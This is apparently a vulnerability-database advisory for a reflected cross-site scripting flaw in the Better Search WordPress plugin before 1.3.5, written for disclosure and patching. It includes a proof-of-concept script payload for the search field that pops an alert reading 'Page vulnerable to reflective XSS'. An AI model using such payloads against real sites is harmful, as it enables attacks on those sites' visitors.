WordPress Plugin Vulnerabilities

Better Search < 1.3.5 - Reflected Cross-Site Scripting (XSS)

Description

By submitting the JavaScript below to the search field Reflected Cross-Site Scripting (XSS) is possible.

<script>alert(String.fromCharCode(80, 97, 103, 101, 32, 118, 117, 108, 110, 101, 114, 97, 98, 108, 101, 32, 116, 111, 32, 114, 101, 102, 108, 101, 99, 116, 105, 118, 101, 32, 88, 83, 83))</script>

Affects Plugins

Fixed in 1.3.5

References

Classification

Type
XSS
CWE

Miscellaneous

Submitter
Juan Avila Reyes
Verified
No

Timeline

Publicly Published
2014-12-16 (about 11 years ago)
Added
2014-12-16 (about 11 years ago)
Last Updated
2021-02-12 (about 5 years ago)

Other